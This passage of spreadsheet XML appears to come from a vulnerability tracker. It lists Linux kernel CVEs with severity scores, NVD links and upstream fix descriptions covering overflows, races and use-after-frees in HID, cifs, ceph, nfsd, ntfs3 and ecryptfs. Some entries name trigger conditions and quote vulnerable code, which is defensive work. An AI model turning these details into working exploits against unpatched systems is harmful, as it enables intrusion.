      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: hold msg ctx list lock when cleaning daemon queue
ecryptfs_exorcise_daemon() drops queued messages from a dying daemon
without holding ecryptfs_msg_ctx_lists_mux, but
ecryptfs_msg_ctx_alloc_to_free() requires that lock.
Take the list lock while moving the queued contexts back to the free
list to avoid racing with other global msg ctx list users.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89609</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89617</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: validate dirty page table on log replay
Each DIR_PAGE_ENTRY ends in a page_lcns[] array whose length is the on-disk
lcns_follow field. check_rstbl() validates the table bookkeeping but never
checks that this array fits in the entry, so a crafted lcns_follow lets the
v0-&gt;v1 conversion memmove and later replay passes run off the entry.
Add check_dp_table() to reject, right after check_rstbl(), any entry larger
than its size claims via struct_size() (the same expression used to allocate
these entries, so the check is overflow-safe by construction). All consumers
can then trust lcns_follow as the real capacity. This covers every
page_lcns[] access whose index is bounded by the entry itself (the
conversion memmove, the HotFix store via find_dp(), and the self-bounded
scan loops). Accesses whose index comes from the log record need a separate
bound and are handled in a follow-up patch.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89617</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89619</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: intel-thc-hid: intel-quickspi: bound GET_REPORT response to the caller buffer
quickspi_hid_raw_request() receives the caller's buffer length in len, but
quickspi_get_report() never sees it and copies the whole device-supplied
response into buf regardless:
    memcpy(buf, qsdev-&gt;report_buf, qsdev-&gt;report_len);
qsdev-&gt;report_len comes from the input report the touch controller returns,
while buf is sized to whatever the caller asked hidraw for through
HIDIOCGFEATURE or HIDIOCGINPUT.  A response larger than that overflows buf
with device-controlled content.
The intel-quicki2c sibling already passes the caller length down to
quicki2c_get_report() and validates the response against it before the
copy.  Do the same here.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89619</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89620</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: intel-thc-hid: intel-quickspi: validate report size before copy
write_cmd_to_txdma() builds an output report in qsdev-&gt;report_buf, a heap
buffer allocated in quickspi_alloc_report_buf() to the device-descriptor
derived max_report_len (a few hundred bytes for a touch controller).  It
copies the caller-supplied report into that buffer:
    memcpy(write_buf-&gt;content, report_buf, report_buf_len);
The HID core caps a report at HID_MAX_BUFFER_SIZE (16384) by default, and
quickspi_hid_ll_driver does not set max_buffer_size, so the length reaches
the driver unbounded.  A hidraw SET_REPORT/SET_FEATURE ioctl carrying a
report larger than max_report_len therefore overflows report_buf with
attacker-controlled length and content.
Record the report_buf allocation size and reject reports that do not fit
before copying, matching the equivalent guard in the intel-quicki2c
sibling (quicki2c_init_write_buf()) and the hid-goodix-spi fix.
write_cmd_to_txdma() writes the output report header ahead of the content
in the same buffer, so size the allocation to cover the header as well.
That keeps the added bound from rejecting a maximum-sized report.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89620</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89622</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: mcp2221: clear rxbuf after I2C/SMBus transfer completes
mcp_i2c_smbus_read() stores the caller-supplied buffer pointer in
mcp-&gt;rxbuf for the duration of a transfer but never clears it when the
transfer finishes or times out. Once the caller frees or reuses the
buffer, mcp-&gt;rxbuf becomes a dangling pointer. A delayed or spurious
MCP2221_I2C_GET_DATA report can then drive mcp2221_raw_event() to
memcpy device data into the freed memory, causing a write
use-after-free.
Route all return paths through a single exit point that clears
mcp-&gt;rxbuf and mcp-&gt;rxbuf_size, so that the existing !mcp-&gt;rxbuf guard
in the raw_event handler can reject any report arriving after the
transfer has ended.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89622</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89624</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: universal-pidff: stop the device when force-feedback init fails
universal_pidff_probe() starts the device with hid_hw_start() and then, if
force-feedback initialisation fails, returns the error through a label that
only does "return error".  The device is left started.
The HID core does not unwind on the driver's behalf.  __hid_device_probe()
releases the devres group, closes the report and clears hdev-&gt;driver:
	if (ret) {
		devres_release_group(&amp;hdev-&gt;dev, hdev-&gt;devres_group_id);
		hid_close_report(hdev);
		hdev-&gt;driver = NULL;
	}
The hidraw character device that hid_hw_start() registered through
hid_connect() is allocated with kzalloc() and added with cdev_device_add(),
so it is not devres-managed and survives that.  With hdev-&gt;driver NULL,
hid_device_remove() skips hid_hw_stop() as well, because it only unwinds
while a driver is still attached.  The registration therefore outlives the
device on both paths.
Opening the surviving /dev/hidrawX writes into freed memory.  KASAN reports
a use-after-free write from hidraw_open() -&gt; hid_hw_open() -&gt; the
transport's open callback, which takes a spinlock inside the freed object.
A descriptor that carries a PID usage page and no input reports is enough:
hidraw claims the device so hid_hw_start() succeeds, while hid-&gt;inputs
stays empty so force-feedback init fails.  The other failure returns in
hid_pidff_init_with_quirks() - no output reports, an allocation failure,
pidff_init_fields(), pidff_check_autocenter(), an unusable effect count,
input_ff_create() - all reach the same label.
Stop the device on that path.  hid-dr.c and hid-emsff.c, which start the
device with the same HID_CONNECT_DEFAULT &amp; ~HID_CONNECT_FF mask, already do
this.  The two earlier gotos must keep returning without hid_hw_stop(),
since neither has a started device, so give the path that fails after the
start its own label.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89624</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89638</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: clear setuid/setgid bit on write with cifsacl/modefromsid/posix extensions
When a file has the setuid or setgid bit set and is written to, the VFS
strips those bits and issues a setattr with ATTR_KILL_SUID/ATTR_KILL_SGID
together with an ATTR_MODE carrying the already-cleared mode.
Both cifs_setattr_unix() and cifs_setattr_nounix() unconditionally dropped
ATTR_MODE in that case:
	/* skip mode change if it's just for clearing setuid/setgid */
	if (attrs-&gt;ia_valid &amp; (ATTR_KILL_SUID|ATTR_KILL_SGID))
		attrs-&gt;ia_valid &amp;= ~ATTR_MODE;
This is fine for the default mount, where the mode is only emulated via
the DOS read-only attribute and cannot represent the setuid/setgid bits
anyway.  However, with the "cifsacl" or "modefromsid" mount options the
mode is stored on the server through an ACL (id_mode_to_cifs_acl()), with
the SMB3.1.1 POSIX extensions the mode is sent to the server directly,
and with the SMB1 Unix extensions (cifs_setattr_unix) the mode is sent
via CIFSSMBUnixSetPathInfo().  In all those cases dropping ATTR_MODE means
the cleared mode is never pushed to the server, so the setuid/setgid bit
survives the write.
This is a security issue: on local filesystems the setuid bit is stripped
when a file is written, but over these cifs.ko mounts the bit persists on
the server, potentially allowing an unexpected privilege escalation on
subsequent execution.
Fix this in two places:
  1. cifs_setattr_nounix(): only take the "skip mode change" shortcut
     when the mode is emulated via the DOS read-only attribute (i.e.
     neither cifsacl/modefromsid nor the SMB3.1.1 POSIX extensions are
     in effect), so that the cleared mode is propagated to the server
     in the ACL / POSIX cases.
  2. cifs_setattr_unix(): this function is only called when Unix
     extensions are in effect, so the mode is always stored on the
     server.  Remove the shortcut entirely so that the cleared mode is
     always pushed.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89638</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89641</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: clear tcon after cifsFileInfo_put() in cifs_file_set_size()
When the else branch of cifs_file_set_size() finds a writable file handle
via find_writable_file(), it borrows tcon and server from the handle's
tlink, attempts the handle-based set_file_size() RPC, and then releases
the handle with cifsFileInfo_put().
If set_file_size() fails, execution falls through to the path-based
fallback, which reuses the borrowed tcon and server under the
"if (tcon == NULL)" guard.  Since tcon is not NULL at that point, the
guard is skipped.  If cifsFileInfo_put() dropped the last reference on a
tlink that was already removed from the tlink tree (TCON_LINK_IN_TREE
cleared, as happens during reconnection or session teardown),
cifs_put_tlink() will have freed tcon; the subsequent set_path_size()
call is then a use-after-free.
Setting tcon = NULL after cifsFileInfo_put() causes the existing guard
to take the cifs_sb_tlink() path, which acquires a fresh reference for
the path-based operation or fails cleanly if the session is gone.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89641</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89646</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix leaked inode reference on writeback abort at umount
ceph_dirty_folio() takes a wrbuffer claim on each newly dirtied folio: it
bumps i_wrbuffer_ref (taking an ihold() on the 0-&gt;1 transition) and
attaches the snap_context to folio-&gt;private.  That claim is released only
by ceph_put_wrbuffer_cap_refs(), which for a submitted write runs from
writepages_finish().
In ceph_submit_write(), if ceph_inc_osd_stopping_blocker() fails -- which
happens during umount -- the request is aborted before submission: the
already-collected folios are only redirtied and unlocked, so
writepages_finish() never runs and the claim is leaked.
redirty_page_for_writepage() -&gt; folio_redirty_for_writepage() -&gt;
filemap_dirty_folio() sets PG_dirty directly and does not go through
-&gt;dirty_folio, so ceph_dirty_folio() is not re-entered to rebalance it.
Because every subsequent writeback also fails the osd_stopping_blocker,
i_wrbuffer_ref never returns to 0, the ihold() is never dropped, and the
inode cannot be evicted:
  VFS: Busy inodes after unmount of ceph
  kernel BUG at fs/super.c:650!
Release the orphaned claim in the abort path before redirtying, via
ceph_undo_wrbuffer_claim(): detach the snap_context, drop the wrbuffer
reference (letting i_wrbuffer_ref reach 0 and iput() the inode), and drop
the snap_context reference -- i.e. do what writepages_finish() would have
done for these never-submitted folios.
Only the locked_pages entries are undone; folios still in the fbatch were
never dirty-cleared by this call (folio_clear_dirty_for_io() is the
ownership-transfer point, and a successful move NULLs the fbatch slot), so
they hold no claim this call owns.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89646</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89668</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: move nfsd_debugfs_init() after nfsd4_init_slabs() in init_nfsd()
nfsd_debugfs_init() runs before nfsd4_init_slabs() in init_nfsd().
If the slab allocation fails, the bare "return retval" bypasses
nfsd_debugfs_exit(), leaving orphan debugfs files with stale fops
pointers into the freed module text.
Move nfsd_debugfs_init() to after the slab init succeeds, so the
early return has no debugfs state to clean up.
Since debugfs is now the more recently initialized of the two, also
update the unwind paths to match reverse-initialization (LIFO) order:
run nfsd_debugfs_exit() before nfsd4_free_slabs() in both the
init_nfsd() error path and exit_nfsd(). The nfsd debugfs files only
reference module-global state and have no dependency on the slab
caches, so that reordering is a cleanup with no functional change.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89668</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89670</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: hold rcu across localio cmpxchg retry
nfsd_file objects are freed via call_rcu (filecache.c:296), and
nfsd_file_slab is created without SLAB_TYPESAFE_BY_RCU
(KMEM_CACHE(nfsd_file, 0) at filecache.c:789), so the slab page
backing a freed nfsd_file becomes freely reclaimable once the RCU
grace period elapses.
The again: retry block in nfsd_open_local_fh() loads a pointer with
cmpxchg and then calls nfsd_file_get(new) (which is
refcount_inc_not_zero) without holding rcu_read_lock. The sole caller
nfs_open_local_fh() drops rcu_read_lock before invoking this helper,
so no outer reader-side critical section covers the load.
    CPU 0 (nfsd_open_local_fh)        CPU 1 (nfsd_file_put_local)
    -----                             -----
    new = cmpxchg(pnf, NULL, ...)
                                      nf = xchg(pnf, NULL)
                                      nfsd_file_put(nf)
                                        last ref -&gt; call_rcu()
                                      /* grace period elapses;
                                         slab page recycled */
    nfsd_file_get(new)
      refcount_inc_not_zero(&amp;new-&gt;nf_ref)
      /* operates on recycled memory */
A non-zero word at the nf_ref offset of the recycled object makes the
refcount bump appear to succeed, and the caller then dereferences
new-&gt;nf_net and new-&gt;nf_file out of freed memory.
Fix by taking rcu_read_lock() immediately before the cmpxchg and
releasing it on all three exits of the if (new) block: the goto-again
retry, the lost-race cleanup path, and the install-succeeded path.
nfsd_file_put() and nfsd_net_put() stay outside the RCU section so
they remain free to block.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89670</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89690</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: defer vfree of compound ops to fix rpc_status UAF
The rpc_status netlink dumpit walks every in-flight svc_rqst under
rcu_read_lock and, for NFSv4 requests, reads opnums out of
args-&gt;ops[]. But args-&gt;ops is a separate vmalloc buffer freed
synchronously by vfree() in nfsd4_release_compoundargs() at the end
of every compound. The dumpit's rcu_read_lock pins the svc_rqst
struct itself (freed via kfree_rcu), but nothing defers the vfree
of the ops buffer across the RCU grace period. A concurrent compound
completion can therefore free the buffer while the dumpit is reading
it — a use-after-free on vmalloc memory.
The trailing seqcount recheck (smp_load_acquire of rq_status_counter)
cannot undo a load that already retired against freed memory.
Fix by replacing vfree(args-&gt;ops) with kvfree_rcu_mightsleep(), which
defers the free until after an RCU grace period. This makes the
existing rcu_read_lock in the dumpit sufficient to protect the read.
The tradeoff is that completed compound ops buffers (up to
200 * sizeof(struct nfsd4_op)) persist in memory slightly longer,
across one grace period, before being reclaimed.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89690</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89723</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
